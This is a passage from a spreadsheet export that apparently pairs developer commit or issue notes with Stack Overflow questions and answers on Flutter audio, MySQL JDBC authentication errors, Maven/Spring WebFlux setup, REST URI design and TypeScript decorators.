      debugPrint(&amp;quot;Audio Player instance is not null !&amp;quot;);
    }
    _audioPlayer ??= AudioPlayer(); //ensure its initialized.
    if (isAudioPlaying) {
      await _audioPlayer?.stop();
    }
    debugPrint(&amp;quot;Playing audio for audiopath : $path&amp;quot;);
    await _audioPlayer?.play(
      AssetSource(path),
      volume: 1,
    );
  }
  void stopAudio() async {
    _audioPlayer ??= AudioPlayer();
    debugPrint(&amp;quot;Stopping audio instance hashcode : ${_audioPlayer.hashCode}&amp;quot;);
    await _audioPlayer!.stop();
  }
  void playAudioInForeground(String path) async {
    String localPath = await getLocalFilePath(path);
    debugPrint(&amp;quot;Setting audio source url&amp;quot;);
    debugPrint(&amp;quot;playing deviceFilePath .&amp;quot;);
    await _audioPlayer?.play(DeviceFileSource(localPath), volume: 1);
  }
  Future&amp;lt;String&amp;gt; getLocalFilePath(String assetPath) async {
    // Get the app's document directory.
    final directory = await getApplicationDocumentsDirectory();
    final filePath = '${directory.path}/$assetPath';
    debugPrint(&amp;quot;File path is $filePath&amp;quot;);
    final file = File(filePath);
    bool isFilePresent = await file.exists();
    debugPrint(&amp;quot;Does file exists $isFilePresent&amp;quot;);
    if (!file.existsSync()) {
      // load assets as bytes.
      debugPrint(&amp;quot;loading bytes from rootbundle&amp;quot;);
      ByteData data = await rootBundle.load(&amp;quot;assets/$assetPath&amp;quot;);
      debugPrint(&amp;quot;loading bytes from ByteData&amp;quot;);
      List&amp;lt;int&amp;gt; bytes = data.buffer.asUint8List();
      debugPrint(&amp;quot;The bytes length is ${bytes.length}&amp;quot;);
      await file.create(recursive: true);
      await file.writeAsBytes(bytes);
      debugPrint(&amp;quot;written to file&amp;quot;);
    }
    debugPrint(&amp;quot;returning device file path - $filePath&amp;quot;);
    return filePath;
  }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C23</t>
  </si>
  <si>
    <t>Checking tomcat logs, we see the error message:
      java.sql.SQLNonTransientConnectionException: Public Key Retrieval is
      not allowed
    Let us add `&amp;allowPublicKeyRetrieval=true` to the connection database
    URL[1]. This is possibly not safe for production and it is unclear why
    this works. Possibly incompatibility between JDBC driver and MySQL?
    Newer versions of MySQL use caching_sha2_password as the default
    authentication plugin for servers instead of mysql_native_password[3].
    Not sure if JDBC driver supports this.
    Other possible methods (untested):
      * Change MySQL server to use legacy method for authentication [2]
      * Change user password to use mysql_native_password [3]
    [1] https://stackoverflow.com/a/50438872
    [2] https://stackoverflow.com/a/49966020
    [3] https://stackoverflow.com/a/50433762</t>
  </si>
  <si>
    <t>You should add client option to your mysql-connector allowPublicKeyRetrieval=true to allow the client to automatically request the public key from the server. Note that allowPublicKeyRetrieval=True could allow a malicious proxy to perform a MITM attack to get the plaintext password, so it is False by default and must be explicitly enabled.
See MySQL .NET Connection String Options
you could also try adding useSSL=false when you use it for testing/develop purposes
example:
jdbc:mysql://localhost:3306/db?allowPublicKeyRetrieval=true&amp;useSSL=false</t>
  </si>
  <si>
    <t>Checking tomcat logs, we see the error message:
      java.sql.SQLNonTransientConnectionException: Public Key Retrieval is
      not allowed
    Let us add `&amp;allowPublicKeyRetrieval=true` to the connection database
    URL[1]. This is possibly not safe for production and it is unclear why
    this works. Possibly incompatibility between JDBC driver and MySQL?
    Newer versions of MySQL use caching_sha2_password as the default
    authentication plugin for servers instead of mysql_native_password[3].
    Not sure if JDBC driver supports this.
    Other possible methods (untested):
      * Change MySQL server to use legacy method for authentication [2]
      * Change user password to use mysql_native_password [3]
    [1] https://stackoverflow.com/a/50438872
    [2] https://stackoverflow.com/a/49966020
    [3] https://stackoverflow.com/a/50433763</t>
  </si>
  <si>
    <t>You can change the encryption of the user's password by altering the user with below ALTER command:
ALTER USER 'username'@'ip_address' IDENTIFIED WITH mysql_native_password BY 'password';
Or we can avoid this error by make it work with old password plugin:
First change the authentication plugin in my.cnf file for Linux / my.ini file in Windows:
[mysqld] 
default_authentication_plugin=mysql_native_password
Restart the mysql server to take the changes in affect and try connecting via MySQL with any mysql client.
If still unable to connect and getting the below error:
Unable to load plugin 'caching_sha2_password'
It means your user needs the above plugin. So try creating new user with create user or grant command after changing default plugin. Then new user need the native plugin and you will able to connect MySQL.</t>
  </si>
  <si>
    <t>Checking tomcat logs, we see the error message:
      java.sql.SQLNonTransientConnectionException: Public Key Retrieval is
      not allowed
    Let us add `&amp;allowPublicKeyRetrieval=true` to the connection database
    URL[1]. This is possibly not safe for production and it is unclear why
    this works. Possibly incompatibility between JDBC driver and MySQL?
    Newer versions of MySQL use caching_sha2_password as the default
    authentication plugin for servers instead of mysql_native_password[3].
    Not sure if JDBC driver supports this.
    Other possible methods (untested):
      * Change MySQL server to use legacy method for authentication [2]
      * Change user password to use mysql_native_password [3]
    [1] https://stackoverflow.com/a/50438872
    [2] https://stackoverflow.com/a/49966020
    [3] https://stackoverflow.com/a/50433764</t>
  </si>
  <si>
    <t>Others have pointed to the root issue, but in my case I was using dbeaver and initially when setting up the mysql connection with dbeaver was selecting the wrong mysql driver (credit here for answer: https://github.com/dbeaver/dbeaver/issues/4691#issuecomment-442173584 )
Selecting the MySQL choice in the below figure will give the error mentioned as the driver is mysql 4+ which can be seen in the database information tip.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a small Flutter application with a structure like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HomePage
  PageView
    Tab1 - list of data w/ FutureBuilder
    Tab2 - list of data w/ StreamBuilder
    Tab3 - list of data w/ StreamBuilder
  Floating Action Button
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The FAB does a different thing based on which tab is currently active (i.e. on Tab1 it opens an &amp;quot;Add New Thing&amp;quot; form, but on Tab2 it opens an &amp;quot;Add New Category of Thing&amp;quot; form). When I tap the FAB from Tab1 and then complete &amp;amp; submit the &amp;quot;Add New Thing&amp;quot; form, I am returned to the Tab1 view - but the data isn't being refreshed. (The future is defined in a variable outside the build method specifically so it isn't called every time the view is loaded - but I need to be able to load it on-demand occasionally.)&lt;/p&gt;
&lt;p&gt;The FAB/submit/return to view process works as expected on Tab2 and Tab3, I suspect because they are streams - but I can't use a stream on Tab1. So how can I force Tab1 to refresh the future it's using when I submit the form &amp;amp; pop the view?&lt;/p&gt;
&lt;p&gt;Here's the FAB code &amp;amp; the form code snippets...&lt;/p&gt;
&lt;pre class="lang-dart prettyprint-override"&gt;&lt;code&gt;/// FloatingActionButton code snippet
onPressed: () async {
          switch (selectedPage) {
            case 0:
              debugPrint('add a new transaction');
              await Navigator.of(context).push(MaterialPageRoute(
                  fullscreenDialog: true,
                  builder: (context) =&amp;gt; AddTransactionTest()));
              setState(() {});
... other cases for Tab2, Tab3 etc
/// Form code snippet
onPressed: () async {
                    try {
                      // do some stuff
                      await insertTransaction(txn);
                      if (mounted) {
                        ScaffoldMessenger.of(context).showSnackBar(
                            SnackBar(content: Text('Transaction saved!')));
                        Navigator.pop(context);
                      }
... error-handling stuff
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C230</t>
  </si>
  <si>
    <t>Redesign Model classes
- To use the Database in IntelliJ, please follow step #3 listed under Prerequirements
- New Database Credentials:
        &lt;property name="username" value="seminarTestDBUser"/&gt;
        &lt;property name="password" value="password1234"/&gt;
- Also make sure that your target release is set on 1.8 (http://stackoverflow.com/questions/29888592/errorjava-javactask-source-release-8-requires-target-release-1-8)</t>
  </si>
  <si>
    <t>Go to File &gt; Settings &gt; Build, Execution, Deployment &gt; Compiler &gt; Java Compiler If on a Mac, it's under Intellij IDEA &gt; Preferences... &gt; Build, Execution, Deployment &gt; Java Compiler
Change Target bytecode version to 1.8 of the module that you are working for.
If you are using Maven
Add the compiler plugin to pom.xml under the top-level project node:
&lt;build&gt;
    &lt;plugins&gt;
        &lt;plugin&gt;
            &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;
            &lt;artifactId&gt;maven-compiler-plugin&lt;/artifactId&gt;
            &lt;configuration&gt;
                &lt;source&gt;1.8&lt;/source&gt;
                &lt;target&gt;1.8&lt;/target&gt;
            &lt;/configuration&gt;
        &lt;/plugin&gt;
    &lt;/plugins&gt;
&lt;/build&gt;
(Hoisted from the comments.)
Note: If you don't mind reimporting your project, then the only thing you really need to do is change the pom and reimport the project, then IntelliJ will pick up the correct settings and you don't have to manually change them.</t>
  </si>
  <si>
    <t xml:space="preserve">Having not done ASP.NET since v1.1, and now blitzing through the Wrox Pro ASP.NET v3.5 book, what other resources are available to get me developing enterprise ASP.NET apps the fastest?
I've been developing in DotNet since Beta and have been doing Winform &amp; middle-layer architecture/design/dev for 3.5 years now (as this has been my client's desires). But I'm finding my falling behind has hurt me concerning a new client. :(
I'd appreciate any advice on moving forward as fast as possible. I'm looking for anything RAD related or even just great books on the subject that you recommend. Right now, I'm having fun consuming the Wrox book though. Thanx much!
</t>
  </si>
  <si>
    <t>C231</t>
  </si>
  <si>
    <t>refactoring/redesign AJAX error messages
https://stackoverflow.com/questions/5454806/rails-3-how-to-redirect-to-in-ajax-call#5471093
Based on the above post from Priit, I decided to handle all AJAX error messages with a specific Message class. I am not able to require files in coffeescript and the class will be inside purchase.coffee.
DEVELOPMENTS
1) The purchases_controller will respond with json to the ajax POST request. The json response will include the notice/erros messages.
render json:  { location: root_path, flash: {note: "Hello"}}
2) The purchase class performing the AJAX POST request will create an instance of the Message class in case of success or error
new Message data.flash["notice"]
3) The Message coffeescript class needs to handle both error and notice messages
TODO
1) Finish writing the enhancement to the Message class so that it handles error and notice messages
2) Understand how to require a coffeescript class Message from another file</t>
  </si>
  <si>
    <t>Finally, I just replaced
redirect_to(:controller =&gt; 'jobs', :action =&gt; 'index')
with this:
render :js =&gt; "window.location = '/jobs/index'"
and it works fine!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a mutli module maven project divided into the following modules: web, model, persistence and service.
I have a serviceimpl in my service-module that should use the web client. However, I get the following error when starting the project:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Caused by: java.lang.ClassNotFoundException: io.netty.channel.ChannelHandler
at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:641) ~[na:na]
at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:188) ~[na:na]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It's not because the dependency is missing, because it comes with the webflux-starter dependendy. Does anyone have an idea? Thanks in advance :)&lt;/p&gt;
&lt;p&gt;I configure the web client on its own config file, which I also reference in my application file so that it is scanned.&lt;/p&gt;
&lt;p&gt;I show you the different files here:&lt;/p&gt;
&lt;p&gt;ServiceImpl:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    private final WebClient webClient;
    public BerufesucheServiceImpl(@Qualifier(&amp;quot;paWebClient&amp;quot;) WebClient webClient) {
        this.webClient = Objects.requireNonNull(webClient);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the configfile, where I configure the webclient:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Configuration
@ComponentScan(basePackages = {&amp;quot;de.mlp.pa.berufesuche.service.persistence&amp;quot;})
public class ServiceConfig {
    @Bean(&amp;quot;paWebClient&amp;quot;)
    public WebClient paWebClient() {
        HttpClient httpClient = HttpClient.create()
                .compress(true)
                .doOnConnected(connection -&amp;gt; connection
                        .addHandlerFirst(new ReadTimeoutHandler(180000, TimeUnit.MILLISECONDS))
                        .addHandlerFirst(new WriteTimeoutHandler(180000, TimeUnit.MILLISECONDS)));
        return WebClient.builder()
                .baseUrl(&amp;quot;http://localhost:8082/berufe-enricher&amp;quot;)
                .clientConnector(new ReactorClientHttpConnector(httpClient))
                .build();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the pom from my servicemodule:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;project xmlns=&amp;quot;http://maven.apache.org/POM/4.0.0&amp;quot; xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;
         xsi:schemaLocation=&amp;quot;http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd&amp;quot;&amp;gt;
    &amp;lt;modelVersion&amp;gt;4.0.0&amp;lt;/modelVersion&amp;gt;
    &amp;lt;parent&amp;gt;
        &amp;lt;groupId&amp;gt;de.mlp.pa.berufesuche&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;berufesuche-parent&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;1.0.0-SNAPSHOT&amp;lt;/version&amp;gt;
    &amp;lt;/parent&amp;gt;
    &amp;lt;artifactId&amp;gt;berufesuche-service&amp;lt;/artifactId&amp;gt;
    &amp;lt;dependencies&amp;gt;
        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;de.mlp.pa.berufesuche&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;berufesuche-model&amp;lt;/artifactId&amp;gt;
        &amp;lt;/dependency&amp;gt;
        &amp;lt;!-- Spring Boot --&amp;gt;
        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;org.springframework.boot&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;spring-boot-starter-webflux&amp;lt;/artifactId&amp;gt;
        &amp;lt;/dependency&amp;gt;
        &amp;lt;!-- Spring --&amp;gt;
        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;org.springframework&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;spring-context-support&amp;lt;/artifactId&amp;gt;
        &amp;lt;/dependency&amp;gt;
    &amp;lt;/dependencies&amp;gt;
&amp;lt;/project&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the parent-pom:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;project xmlns=&amp;quot;http://maven.apache.org/POM/4.0.0&amp;quot; xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;
         xsi:schemaLocation=&amp;quot;http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd&amp;quot;&amp;gt;
    &amp;lt;modelVersion&amp;gt;4.0.0&amp;lt;/modelVersion&amp;gt;
    &amp;lt;groupId&amp;gt;de.mlp.pa.berufesuche&amp;lt;/groupId&amp;gt;
    &amp;lt;artifactId&amp;gt;berufesuche-parent&amp;lt;/artifactId&amp;gt;
    &amp;lt;version&amp;gt;1.0.0-SNAPSHOT&amp;lt;/version&amp;gt;
    &amp;lt;packaging&amp;gt;pom&amp;lt;/packaging&amp;gt;
    &amp;lt;modules&amp;gt;
        &amp;lt;module&amp;gt;berufesuche-web&amp;lt;/module&amp;gt;
        &amp;lt;module&amp;gt;berufesuche-persistence&amp;lt;/module&amp;gt;
        &amp;lt;module&amp;gt;berufesuche-model&amp;lt;/module&amp;gt;
        &amp;lt;module&amp;gt;berufesuche-service&amp;lt;/module&amp;gt;
    &amp;lt;/modules&amp;gt;
    &amp;lt;properties&amp;gt;
        &amp;lt;!-- Compiler Properties --&amp;gt;
        &amp;lt;java.version&amp;gt;21&amp;lt;/java.version&amp;gt;
        &amp;lt;project.build.sourceEncoding&amp;gt;UTF-8&amp;lt;/project.build.sourceEncoding&amp;gt;
        &amp;lt;!-- dependency versions --&amp;gt;
        &amp;lt;springboot.version&amp;gt;3.4.2&amp;lt;/springboot.version&amp;gt;
        &amp;lt;!-- Plugin Versions --&amp;gt;
        &amp;lt;maven-compiler-plugin.version&amp;gt;3.13.0&amp;lt;/maven-compiler-plugin.version&amp;gt;
        &amp;lt;maven-clean-plugin.version&amp;gt;3.4.0&amp;lt;/maven-clean-plugin.version&amp;gt;
        &amp;lt;maven-source-plugin.version&amp;gt;3.3.1&amp;lt;/maven-source-plugin.version&amp;gt;
        &amp;lt;maven-surefire-plugin-version&amp;gt;3.5.2&amp;lt;/maven-surefire-plugin-version&amp;gt;
        &amp;lt;maven-dependency-plugin.version&amp;gt;3.8.1&amp;lt;/maven-dependency-plugin.version&amp;gt;
        &amp;lt;dependency-check-maven.version&amp;gt;10.0.4&amp;lt;/dependency-check-maven.version&amp;gt;
    &amp;lt;/properties&amp;gt;
    &amp;lt;dependencyManagement&amp;gt;
        &amp;lt;dependencies&amp;gt;
            &amp;lt;!-- Project internal dependencies --&amp;gt;
            &amp;lt;dependency&amp;gt;
                &amp;lt;groupId&amp;gt;de.mlp.pa.berufesuche&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;berufesuche-web&amp;lt;/artifactId&amp;gt;
                &amp;lt;version&amp;gt;${project.version}&amp;lt;/version&amp;gt;
            &amp;lt;/dependency&amp;gt;
            &amp;lt;dependency&amp;gt;
                &amp;lt;groupId&amp;gt;de.mlp.pa.berufesuche&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;berufesuche-persistence&amp;lt;/artifactId&amp;gt;
                &amp;lt;version&amp;gt;${project.version}&amp;lt;/version&amp;gt;
            &amp;lt;/dependency&amp;gt;
            &amp;lt;dependency&amp;gt;
                &amp;lt;groupId&amp;gt;de.mlp.pa.berufesuche&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;berufesuche-model&amp;lt;/artifactId&amp;gt;
                &amp;lt;version&amp;gt;${project.version}&amp;lt;/version&amp;gt;
            &amp;lt;/dependency&amp;gt;
            &amp;lt;dependency&amp;gt;
                &amp;lt;groupId&amp;gt;de.mlp.pa.berufesuche&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;berufesuche-service&amp;lt;/artifactId&amp;gt;
                &amp;lt;version&amp;gt;${project.version}&amp;lt;/version&amp;gt;
            &amp;lt;/dependency&amp;gt;
            &amp;lt;!-- Spring Boot --&amp;gt;
            &amp;lt;dependency&amp;gt;
                &amp;lt;groupId&amp;gt;org.springframework.boot&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;spring-boot-dependencies&amp;lt;/artifactId&amp;gt;
                &amp;lt;version&amp;gt;${springboot.version}&amp;lt;/version&amp;gt;
                &amp;lt;type&amp;gt;pom&amp;lt;/type&amp;gt;
                &amp;lt;scope&amp;gt;import&amp;lt;/scope&amp;gt;
            &amp;lt;/dependency&amp;gt;
        &amp;lt;/dependencies&amp;gt;
    &amp;lt;/dependencyManagement&amp;gt;
    &amp;lt;dependencies&amp;gt;
        &amp;lt;!-- Testing dependencies --&amp;gt;
        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;org.springframework.boot&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;spring-boot-starter-test&amp;lt;/artifactId&amp;gt;
            &amp;lt;scope&amp;gt;test&amp;lt;/scope&amp;gt;
        &amp;lt;/dependency&amp;gt;
    &amp;lt;/dependencies&amp;gt;
    &amp;lt;build&amp;gt;
        &amp;lt;pluginManagement&amp;gt;
            &amp;lt;plugins&amp;gt;
                &amp;lt;plugin&amp;gt;
                    &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                    &amp;lt;artifactId&amp;gt;maven-source-plugin&amp;lt;/artifactId&amp;gt;
                    &amp;lt;version&amp;gt;${maven-source-plugin.version}&amp;lt;/version&amp;gt;
                    &amp;lt;executions&amp;gt;
                        &amp;lt;execution&amp;gt;
                            &amp;lt;id&amp;gt;attach-sources&amp;lt;/id&amp;gt;
                            &amp;lt;phase&amp;gt;verify&amp;lt;/phase&amp;gt;
                            &amp;lt;goals&amp;gt;
                                &amp;lt;goal&amp;gt;jar-no-fork&amp;lt;/goal&amp;gt;
                            &amp;lt;/goals&amp;gt;
                        &amp;lt;/execution&amp;gt;
                    &amp;lt;/executions&amp;gt;
                &amp;lt;/plugin&amp;gt;
                &amp;lt;plugin&amp;gt;
                    &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                    &amp;lt;artifactId&amp;gt;maven-clean-plugin&amp;lt;/artifactId&amp;gt;
                    &amp;lt;version&amp;gt;${maven-clean-plugin.version}&amp;lt;/version&amp;gt;
                    &amp;lt;configuration&amp;gt;
                        &amp;lt;filesets&amp;gt;
                            &amp;lt;fileset&amp;gt;
                                &amp;lt;directory&amp;gt;src/main/generated/&amp;lt;/directory&amp;gt;
                                &amp;lt;includes&amp;gt;
                                    &amp;lt;include&amp;gt;*&amp;lt;/include&amp;gt;
                                &amp;lt;/includes&amp;gt;
                            &amp;lt;/fileset&amp;gt;
                        &amp;lt;/filesets&amp;gt;
                    &amp;lt;/configuration&amp;gt;
                &amp;lt;/plugin&amp;gt;
                &amp;lt;plugin&amp;gt;
                    &amp;lt;groupId&amp;gt;org.springframework.boot&amp;lt;/groupId&amp;gt;
                    &amp;lt;artifactId&amp;gt;spring-boot-maven-plugin&amp;lt;/artifactId&amp;gt;
                    &amp;lt;version&amp;gt;${springboot.version}&amp;lt;/version&amp;gt;
                    &amp;lt;executions&amp;gt;
                        &amp;lt;execution&amp;gt;
                            &amp;lt;goals&amp;gt;
                                &amp;lt;goal&amp;gt;repackage&amp;lt;/goal&amp;gt;
                            &amp;lt;/goals&amp;gt;
                            &amp;lt;configuration&amp;gt;
                                &amp;lt;classifier&amp;gt;spring-boot&amp;lt;/classifier&amp;gt;
                            &amp;lt;/configuration&amp;gt;
                        &amp;lt;/execution&amp;gt;
                    &amp;lt;/executions&amp;gt;
                &amp;lt;/plugin&amp;gt;
                &amp;lt;plugin&amp;gt;
                    &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                    &amp;lt;artifactId&amp;gt;maven-dependency-plugin&amp;lt;/artifactId&amp;gt;
                    &amp;lt;version&amp;gt;${maven-dependency-plugin.version}&amp;lt;/version&amp;gt;
                    &amp;lt;executions&amp;gt;
                        &amp;lt;execution&amp;gt;
                            &amp;lt;goals&amp;gt;
                                &amp;lt;goal&amp;gt;properties&amp;lt;/goal&amp;gt;
                            &amp;lt;/goals&amp;gt;
                        &amp;lt;/execution&amp;gt;
                    &amp;lt;/executions&amp;gt;
                &amp;lt;/plugin&amp;gt;
                &amp;lt;plugin&amp;gt;
                    &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                    &amp;lt;artifactId&amp;gt;maven-surefire-plugin&amp;lt;/artifactId&amp;gt;
                    &amp;lt;version&amp;gt;${maven-surefire-plugin-version}&amp;lt;/version&amp;gt;
                    &amp;lt;configuration&amp;gt;
                        &amp;lt;includes&amp;gt;
                            &amp;lt;include&amp;gt;**/*Test.java&amp;lt;/include&amp;gt;
                            &amp;lt;include&amp;gt;**/*IT.java&amp;lt;/include&amp;gt;
                        &amp;lt;/includes&amp;gt;
                        &amp;lt;!-- This fixes the problem of dynamic agent loading in jdk21+ --&amp;gt;
                        &amp;lt;argLine&amp;gt;
                            @{argLine} -Xms1G -Xmx4G -javaagent:${org.mockito:mockito-core:jar}
                        &amp;lt;/argLine&amp;gt;
                    &amp;lt;/configuration&amp;gt;
                &amp;lt;/plugin&amp;gt;
                &amp;lt;plugin&amp;gt;
                    &amp;lt;groupId&amp;gt;org.owasp&amp;lt;/groupId&amp;gt;
                    &amp;lt;artifactId&amp;gt;dependency-check-maven&amp;lt;/artifactId&amp;gt;
                    &amp;lt;version&amp;gt;${dependency-check-maven.version}&amp;lt;/version&amp;gt;
                    &amp;lt;executions&amp;gt;
                        &amp;lt;execution&amp;gt;
                            &amp;lt;goals&amp;gt;
                                &amp;lt;goal&amp;gt;check&amp;lt;/goal&amp;gt;
                            &amp;lt;/goals&amp;gt;
                        &amp;lt;/execution&amp;gt;
                    &amp;lt;/executions&amp;gt;
                &amp;lt;/plugin&amp;gt;
            &amp;lt;/plugins&amp;gt;
        &amp;lt;/pluginManagement&amp;gt;
        &amp;lt;plugins&amp;gt;
            &amp;lt;plugin&amp;gt;
                &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;maven-clean-plugin&amp;lt;/artifactId&amp;gt;
            &amp;lt;/plugin&amp;gt;
            &amp;lt;plugin&amp;gt;
                &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;maven-compiler-plugin&amp;lt;/artifactId&amp;gt;
            &amp;lt;/plugin&amp;gt;
            &amp;lt;plugin&amp;gt;
                &amp;lt;groupId&amp;gt;org.jacoco&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;jacoco-maven-plugin&amp;lt;/artifactId&amp;gt;
            &amp;lt;/plugin&amp;gt;
            &amp;lt;plugin&amp;gt;
                &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;maven-dependency-plugin&amp;lt;/artifactId&amp;gt;
            &amp;lt;/plugin&amp;gt;
            &amp;lt;plugin&amp;gt;
                &amp;lt;groupId&amp;gt;org.apache.maven.plugins&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;maven-surefire-plugin&amp;lt;/artifactId&amp;gt;
            &amp;lt;/plugin&amp;gt;
        &amp;lt;/plugins&amp;gt;
    &amp;lt;/build&amp;gt;
    &amp;lt;profiles&amp;gt;
        &amp;lt;profile&amp;gt;
            &amp;lt;id&amp;gt;OWASP&amp;lt;/id&amp;gt;
            &amp;lt;build&amp;gt;
                &amp;lt;plugins&amp;gt;
                    &amp;lt;plugin&amp;gt;
                        &amp;lt;groupId&amp;gt;org.owasp&amp;lt;/groupId&amp;gt;
                        &amp;lt;artifactId&amp;gt;dependency-check-maven&amp;lt;/artifactId&amp;gt;
                    &amp;lt;/plugin&amp;gt;
                &amp;lt;/plugins&amp;gt;
            &amp;lt;/build&amp;gt;
        &amp;lt;/profile&amp;gt;
    &amp;lt;/profiles&amp;gt;
&amp;lt;/project&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the applicationfile, where I import ther configfile:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@SpringBootApplication
@Import(value = {
        PersistenceConfig.class,
        ServiceConfig.class,
        WebConfig.class,
})
public class BerufesucheApplication {
    public static void main(String[] args) {
        SpringApplication.run(BerufesucheApplication.class, args);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C232</t>
  </si>
  <si>
    <t>There are some ambiguities and inconsistencies to our REST API:
The User-Service provides the collection of all users at the /users/ route. Naturally, a single user is addressed by its ID as follows /users/&lt;user-id&gt;/. However, the route to create batches of users is /users/batch/.
The collection of all available settings can be retrieved with a GET request to /settings/info/. However, the info suffix provides no meaning at all and should be removed from the URI.
The user preferences can be fetched from /users/&lt;user-id&gt;/settings/preferences where again the settings does not provide any meaning and should be removed.
About the first one (this does not really solve the issue, but is nice to know imho): https://stackoverflow.com/questions/20951419/what-are-best-practices-for-rest-nested-resources
So, we have to figure out if it is good to allow subresources without the scope of an identified parent resource: /users/batch/ instead of /users/1/batch/, obviously the latter does not really make sense in our case. It may be that this is an indicator for "transforming the subresource to a top level resource". (for example: https://softwareengineering.stackexchange.com/questions/382293/listing-all-sub-resources-without-parent-scope)</t>
  </si>
  <si>
    <t>What you have done is correct.  In general there can be many URIs to the same resource - there are no rules that say you shouldn't do that.
And generally, you may need to access items directly or as a subset of something else - so your structure makes sense to me.
Just because employees are accessible under department:
company/{companyid}/department/{departmentid}/employees
Doesn't mean they can't be accessible under company too:
company/{companyid}/employees
Which would return employees for that company.  It depends on what is needed by your consuming client - that is what you should be designing for.
But I would hope that all URLs handlers use the same backing code to satisfy the requests so that you aren't duplicating code.</t>
  </si>
  <si>
    <t xml:space="preserve">What would be the best scheme for loading icons for an application?
A little bit of a background...  Iâ€™m creating an FTP-like application that has 4 panes (local folder pane, local file pane, cloud folder pane, cloud file pane).  In both file panes, one of the columns is filename, which I want to display the icon next to (just like you see in Windows Explorer).
Do to the fact that I do not have the physical file for all files in the cloud, I have to poke into the registry (with file extension in hand) and get the ExeFileName and IconIndex combination for that file type, and from there the retrieve the icon.  That said, I think that I have the below options, and would like to get your opinion:
1) Load all ExeFileName/IconIndex combinations for every extension (EG: .doc, .txt) on program load and as needed query and use them to call out to the ExtractIcon Win32 API.
2) Poke into the registry only when needed to get the ExeFileName/IconIndex combinations and call out to the ExtractIcon Win32 API for the icon of the associated file type.
3) Save a 1 byte file of every extension known, to a directory and call out to the SHGetFileInfo Win32 API and pluck the associated icon from the file when needed.
4) Save the physical icon file for every file extension at the time of install to a directory and call out to this when need (but will not change with file association changes, additions, or deletions).
5) Junk the whole thing and buy a set of icons from an icon shop that has the top 1000 icon file types known, and display an unknown icon type of the other file types.
Thank you for your time and comments.
-Jessy Houle
</t>
  </si>
  <si>
    <t>C233</t>
  </si>
  <si>
    <t>Use a decorator the define a Form
This keeps everything consistent and allows us to be able to create a
whole form easily, without having to reuse code.
Each Form has to extend from the `BaseForm` class because we don’t get
the typing on decorated classes yet, so we have to tell the compiler
what type the class is (see https://stackoverflow.com/a/48152072/452684)</t>
  </si>
  <si>
    <t>Decorators are used for all kinds of reasons, from modifying a class, to aspect-oriented programming, to simple logging. Almost anything can happen inside a decorator. At this time, the contents of the decorator is not used to modify the type information for the class (in some cases, it may not ever be possible to do so, although in your case it would be possible as it is such a straightforward one).
If you want to add methods to a class, you might consider
TypeScript mixins
as an alternative, or simple inheritance (see below).
Placeholder Implementation
A simple fix for your issue would be to provide an empty method to generate the type information you want:
@decorator
class Test {
  constructor() {
      this.method();
    }
